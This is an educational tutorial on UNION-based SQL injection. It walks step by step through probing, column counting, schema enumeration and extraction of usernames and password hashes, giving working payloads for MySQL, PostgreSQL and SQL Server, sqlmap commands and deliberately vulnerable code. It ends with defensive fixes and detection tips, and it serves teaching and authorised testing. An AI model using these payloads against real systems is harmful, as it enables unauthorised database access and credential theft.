UNION-based SQL injection is one of those classic web vulns that keeps showing up because the root cause is simple: untrusted input gets stitched into a SQL query. But when the stars align—same number of columns, compatible data types, and reflected output—UNION turns a boring bug into a data exfiltration pipeline. In this guide, we’ll walk through how UNION-based SQL injection works, how attackers extract data column by column, and how defenders shut it down properly. This is educational content for developers and junior security engineers: the goal is to understand the mechanics deeply enough to prevent, detect, and test safely in authorized environments.

Why UNION-based SQL injection matters

A typical SQL injection lets an attacker alter the logic of a query. UNION-based SQL injection goes a step further: it appends the results of a second SELECT statement to the original query’s result set.

That matters because if the application displays query results back to the user, an attacker may be able to make the database return arbitrary data—usernames, password hashes, schema metadata, API keys, and more.

The trick is that the injected query must satisfy SQL rules:

  • The original and injected SELECT must return the same number of columns
  • The data types must be compatible position by position
  • The resulting rows must be rendered somewhere in the application response

That’s why exploitation often feels methodical: find the column count, identify which columns are reflected, then extract data one chunk at a time.

A vulnerable example

Imagine a product search page backed by code like this:

php
<?php
$category = $_GET['category'];
$sql = "SELECT id, name, description FROM products WHERE category = '$category'";
$result = mysqli_query($conn, $sql);
?>

A normal request might look like:

http
GET /products.php?category=books HTTP/1.1
Host: example.com

Which produces a query like:

sql
SELECT id, name, description
FROM products
WHERE category = 'books'

If input is not sanitized or parameterized, an attacker can break out of the string and append SQL. For example:

http
GET /products.php?category=books' UNION SELECT 1,2,3-- - HTTP/1.1
Host: example.com

Resulting SQL:

sql
SELECT id, name, description
FROM products
WHERE category = 'books'
UNION
SELECT 1,2,3-- -

If successful, the page may now display values from the injected row.

How UNION works in SQL

UNION combines the results of two SELECT statements:

sql
SELECT col1, col2 FROM table1
UNION
SELECT col1, col2 FROM table2

Important details:

  • Both queries must have the same number of columns
  • Corresponding columns must be type-compatible
  • UNION removes duplicates; UNION ALL keeps them

Attackers often prefer UNION ALL because it avoids deduplication and can be faster:

sql
SELECT id, name, description FROM products
UNION ALL
SELECT 1, 'owned', 'test'

Whether UNION ALL works depends on the DBMS and the context, but it’s worth testing.

Step 1: Confirming injectable behavior

In an authorized test, the first step is usually to observe how input affects the query.

Common probes include:

http
GET /products.php?category=books' HTTP/1.1
Host: example.com

If the app returns a SQL syntax error, that’s already a strong signal.

Other classic tests:

http
GET /products.php?category=books'-- - HTTP/1.1
Host: example.com
http
GET /products.php?category=books' OR '1'='1-- - HTTP/1.1
Host: example.com

These help determine:

  • Is the input placed inside quotes?
  • Can we terminate the original predicate?
  • Are comments supported in this context?

Comment syntax varies by database:

sql
-- comment
# comment
/* comment */

For MySQL, -- usually requires a trailing space.

Step 2: Finding the number of columns

Before a UNION payload works, the attacker needs the correct column count.

There are two common methods:

Method A: ORDER BY enumeration

If the original query has n columns, ORDER BY n may work, but ORDER BY n+1 will often trigger an error.

Try incrementing:

http
GET /products.php?category=books' ORDER BY 1-- - HTTP/1.1
Host: example.com
http
GET /products.php?category=books' ORDER BY 2-- - HTTP/1.1
Host: example.com
http
GET /products.php?category=books' ORDER BY 3-- - HTTP/1.1
Host: example.com
http
GET /products.php?category=books' ORDER BY 4-- - HTTP/1.1
Host: example.com

If ORDER BY 3 works and ORDER BY 4 fails, the query likely returns 3 columns.

Method B: UNION SELECT NULL enumeration

Another method is to try UNION SELECT with increasing numbers of NULLs:

http
GET /products.php?category=books' UNION SELECT NULL-- - HTTP/1.1
Host: example.com
http
GET /products.php?category=books' UNION SELECT NULL,NULL-- - HTTP/1.1
Host: example.com
http
GET /products.php?category=books' UNION SELECT NULL,NULL,NULL-- - HTTP/1.1
Host: example.com

NULL is useful because it can usually fit into many column types. When the column count matches, the query may succeed.

If the original query returns 3 columns, this payload is a likely candidate:

http
GET /products.php?category=books' UNION SELECT NULL,NULL,NULL-- - HTTP/1.1
Host: example.com

Step 3: Identifying reflected columns

Knowing the column count isn’t enough. You need to know which columns are actually visible in the HTTP response.

Replace NULLs with recognizable values:

http
GET /products.php?category=books' UNION SELECT 1,2,3-- - HTTP/1.1
Host: example.com

If the page displays something like:

  • Product name: 2
  • Description: 3

Then columns 2 and 3 are reflected, and those positions are useful for exfiltrating text.

This is the “column by column” mindset: each output position is a slot. Figure out which slots are visible, then place useful data into them.

For string contexts, you might need quoted values:

http
GET /products.php?category=books' UNION SELECT 1,'marker','test'-- - HTTP/1.1
Host: example.com

If a column expects text and you inject a number, the DBMS may coerce it—or reject it. Testing reveals what works.

Step 4: Extracting database metadata

Once reflected columns are known, attackers typically ask the database who it is and what it contains.

Current database version

MySQL:

http
GET /products.php?category=books' UNION SELECT 1,@@version,3-- - HTTP/1.1
Host: example.com

PostgreSQL:

http
GET /products.php?category=books' UNION SELECT 1,version(),3-- - HTTP/1.1
Host: example.com

Microsoft SQL Server:

http
GET /products.php?category=books' UNION SELECT 1,@@version,3-- - HTTP/1.1
Host: example.com

Current database name

MySQL:

http
GET /products.php?category=books' UNION SELECT 1,database(),3-- - HTTP/1.1
Host: example.com

PostgreSQL:

http
GET /products.php?category=books' UNION SELECT 1,current_database(),3-- - HTTP/1.1
Host: example.com

SQL Server:

http
GET /products.php?category=books' UNION SELECT 1,DB_NAME(),3-- - HTTP/1.1
Host: example.com

This helps scope the environment and identify what schema to enumerate next.

Step 5: Enumerating tables and columns

Now we move from “what DB is this?” to “what data exists here?”

MySQL: using `information_schema`

List tables in the current database:

http
GET /products.php?category=books' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()-- - HTTP/1.1
Host: example.com

List columns for a table named users:

http
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- - HTTP/1.1
Host: example.com

If multiple schemas exist, include table_schema:

http
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_schema=database() AND table_name='users'-- - HTTP/1.1
Host: example.com

PostgreSQL

List tables:

http
GET /products.php?category=books' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='public'-- - HTTP/1.1
Host: example.com

List columns:

http
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- - HTTP/1.1
Host: example.com

SQL Server

List tables:

http
GET /products.php?category=books' UNION SELECT 1,table_name,3 FROM information_schema.tables-- - HTTP/1.1
Host: example.com

List columns:

http
GET /products.php?category=books' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- - HTTP/1.1
Host: example.com

Step 6: Extracting data column by column

Here’s where UNION-based SQLi becomes practical. Suppose we discovered a users table with columns:

  • id
  • username
  • email
  • password_hash

And we know columns 2 and 3 of the response are visible.

We can start extracting one field at a time:

http
GET /products.php?category=books' UNION SELECT id,username,email FROM users-- - HTTP/1.1
Host: example.com

If that works, rows from users may be rendered directly.

But often the page layout only displays one or two fields cleanly. In that case, attackers concatenate multiple values into a single visible column.

MySQL concatenation

http
GET /products.php?category=books' UNION SELECT 1,concat(username,':',password_hash),3 FROM users-- - HTTP/1.1
Host: example.com

Or with separators for readability:

http
GET /products.php?category=books' UNION SELECT 1,concat(id,' | ',username,' | ',email),3 FROM users-- - HTTP/1.1
Host: example.com

PostgreSQL concatenation

http
GET /products.php?category=books' UNION SELECT 1,username || ':' || password_hash,3 FROM users-- - HTTP/1.1
Host: example.com

SQL Server concatenation

http
GET /products.php?category=books' UNION SELECT 1,username + ':' + password_hash,3 FROM users-- - HTTP/1.1
Host: example.com

This is the essence of extracting data column by column: if you can only see one useful output slot, pack the sensitive columns into that slot.

Managing row limits and pagination

Real applications often display only the first few rows, or render a single result. That means exfiltration may need to happen incrementally.

Limiting results in MySQL

http
GET /products.php?category=books' UNION SELECT 1,concat(username,':',password_hash),3 FROM users LIMIT 0,1-- - HTTP/1.1
Host: example.com

Then:

http
GET /products.php?category=books' UNION SELECT 1,concat(username,':',password_hash),3 FROM users LIMIT 1,1-- - HTTP/1.1
Host: example.com

And so on.

PostgreSQL offset/limit

http
GET /products.php?category=books' UNION SELECT 1,username || ':' || password_hash,3 FROM users LIMIT 1 OFFSET 0-- - HTTP/1.1
Host: example.com

SQL Server top / offset

http
GET /products.php?category=books' UNION SELECT TOP 1 1,username + ':' + password_hash,3 FROM users-- - HTTP/1.1
Host: example.com

When the page only shows one row, this “walk the table” approach is how data gets extracted piece by piece.

Bypassing type mismatches

Sometimes the injected value lands in a numeric column, but you want to display text. Or the DBMS complains about incompatible types.

A few techniques help:

Use `NULL` for non-visible columns

If only one output column matters, keep the others neutral:

http
GET /products.php?category=books' UNION SELECT NULL,concat(username,':',password_hash),NULL FROM users-- - HTTP/1.1
Host: example.com

Cast values explicitly

MySQL:

http
GET /products.php?category=books' UNION SELECT 1,cast(password_hash as char),3 FROM users-- - HTTP/1.1
Host: example.com

PostgreSQL:

http
GET /products.php?category=books' UNION SELECT 1,cast(id as text),3 FROM users-- - HTTP/1.1
Host: example.com

SQL Server:

http
GET /products.php?category=books' UNION SELECT 1,cast(id as varchar(100)),3 FROM users-- - HTTP/1.1
Host: example.com

Match original query types

If the first selected column is numeric, don’t force text into it. Put text in a text-compatible reflected column instead.

A realistic walkthrough

Let’s say we have this endpoint:

http
GET /filter?category=Gifts

Back-end query:

sql
SELECT id, title, summary
FROM products
WHERE category = 'Gifts'

1. Probe for injection

http
GET /filter?category=Gifts'

Error appears. Good signal.

2. Find column count

http
GET /filter?category=Gifts' ORDER BY 1-- -
GET /filter?category=Gifts' ORDER BY 2-- -
GET /filter?category=Gifts' ORDER BY 3-- -
GET /filter?category=Gifts' ORDER BY 4-- -

ORDER BY 4 fails. So: 3 columns.

3. Find visible columns

http
GET /filter?category=Gifts' UNION SELECT 1,2,3-- -

The page shows 2 in the title field and 3 in the summary field.

4. Identify DB

http
GET /filter?category=Gifts' UNION SELECT 1,@@version,3-- -

Response suggests MySQL.

5. Enumerate tables

http
GET /filter?category=Gifts' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()-- -

Interesting table appears: users.

6. Enumerate columns

http
GET /filter?category=Gifts' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_schema=database() AND table_name='users'-- -

Columns found: id, username, email, password_hash.

7. Extract data

http
GET /filter?category=Gifts' UNION SELECT 1,concat(username,' | ',email),password_hash FROM users-- -

Now the page renders usernames, emails, and hashes across visible fields.

That’s the full chain: identify, align, enumerate, extract.

Using tools safely

Manual testing teaches the mechanics best, but in authorized assessments you’ll often verify with tooling.

For example, a safe lab command with sqlmap might look like:

bash
sqlmap -u "http://localhost/filter?category=Gifts" --batch --risk=1 --level=2

To enumerate databases in a lab:

bash
sqlmap -u "http://localhost/filter?category=Gifts" --dbs

To enumerate tables from a chosen database:

bash
sqlmap -u "http://localhost/filter?category=Gifts" -D appdb --tables

Use tools only where you have explicit permission. On real systems, unauthorized testing is illegal and unethical.

Why developers accidentally enable this

UNION-based SQLi usually comes from one of these patterns:

  • String concatenation in SQL queries
  • Legacy code using raw query APIs
  • “Sanitization” based on blacklists
  • Dynamic filtering/sorting built without allowlists
  • Overly privileged database accounts that expose too much if compromised

A dangerous anti-pattern looks like this:

javascript
const category = req.query.category;
const sql = `SELECT id, title, summary FROM products WHERE category = '${category}'`;
const rows = await db.query(sql);

Even if developers try to strip quotes or keywords, attackers can often bypass naive filters.

Defenses that actually work

Parameterized queries

This is the primary fix. Never build SQL by concatenating user input.

Node.js with `mysql2`

javascript
const [rows] = await connection.execute(
  'SELECT id, title, summary FROM products WHERE category = ?',
  [req.query.category]
);

Python with `psycopg2`

python
cur.execute(
    "SELECT id, title, summary FROM products WHERE category = %s",
    (category,)
)

PHP with PDO

php
$stmt = $pdo->prepare("SELECT id, name, description FROM products WHERE category = ?");
$stmt->execute([$category]);
$rows = $stmt->fetchAll();

Parameterized queries ensure user input is treated as data, not executable SQL.

Stored procedures—carefully

Stored procedures can help, but only if they avoid dynamic SQL built from untrusted input.

Bad:

sql
SET @sql = CONCAT('SELECT * FROM products WHERE category = ''', user_input, '''');
PREPARE stmt FROM @sql;
EXECUTE stmt;

Good practice means parameters, not string assembly.

Allowlist dynamic identifiers

You cannot parameterize everything. Things like column names in ORDER BY often require allowlisting.

Bad:

javascript
const sort = req.query.sort;
const sql = `SELECT id, title FROM products ORDER BY ${sort}`;

Better:

javascript
const allowed = new Set(['title', 'created_at', 'price']);
const sort = allowed.has(req.query.sort) ? req.query.sort : 'title';
const sql = `SELECT id, title FROM products ORDER BY ${sort}`;

Least privilege in the database

If the application account only needs SELECT on a few tables, don’t give it broad access.

Good restrictions include:

  • No administrative privileges
  • No access to unrelated schemas
  • No file or command execution features
  • Separate accounts per app/service where possible

This won’t prevent SQLi, but it reduces blast radius.

Generic error handling

Verbose SQL errors are gold for attackers. Don’t expose raw database exceptions to users.

Bad:

text
You have an error in your SQL syntax near 'UNION SELECT...'

Better:

  • Return a generic error page to users
  • Log detailed errors server-side
  • Alert on repeated malformed query patterns

WAFs and filters are not primary controls

A WAF may detect obvious payloads, but it is not a substitute for fixing the code. Treat it as a speed bump, not a seatbelt.

Detection and testing tips for defenders

If you’re reviewing an app or building detection logic, watch for:

  • Repeated single quotes in query parameters
  • UNION SELECT, ORDER BY, information_schema
  • SQL comment markers like --, #, /*
  • Sudden spikes in 500 errors tied to a specific endpoint
  • Response bodies containing DB version strings or schema metadata

In code review, grep for risky patterns:

bash
grep -R "SELECT .* \+.*req\." .
grep -R "query(" .
grep -R "execute(" .

And in JavaScript/TypeScript projects, look for template literals used in SQL:

bash
grep -R "SELECT .*${" .

Static analysis and secure code review catch a lot of these before deployment.

Key takeaways

UNION-based SQL injection is powerful because it transforms a query-manipulation bug into a data retrieval channel. The exploitation flow is usually:

  1. Confirm injection
  2. Find the number of columns
  3. Identify reflected columns
  4. Enumerate schema metadata
  5. Extract data column by column or by concatenating values into visible slots

For attackers in labs, it’s systematic. For defenders, that same predictability is useful: if you understand the workflow, you know exactly where to break the chain.

The real fix is boring in the best way: parameterized queries, allowlisted dynamic SQL parts, least-privileged DB accounts, and disciplined error handling. If you build with those defaults, UNION-based SQLi goes from “critical incident” to “non-event.”

And that’s the hacker lesson worth keeping: the flashy payload is never the real story. The real story is always the trust boundary you forgot to defend.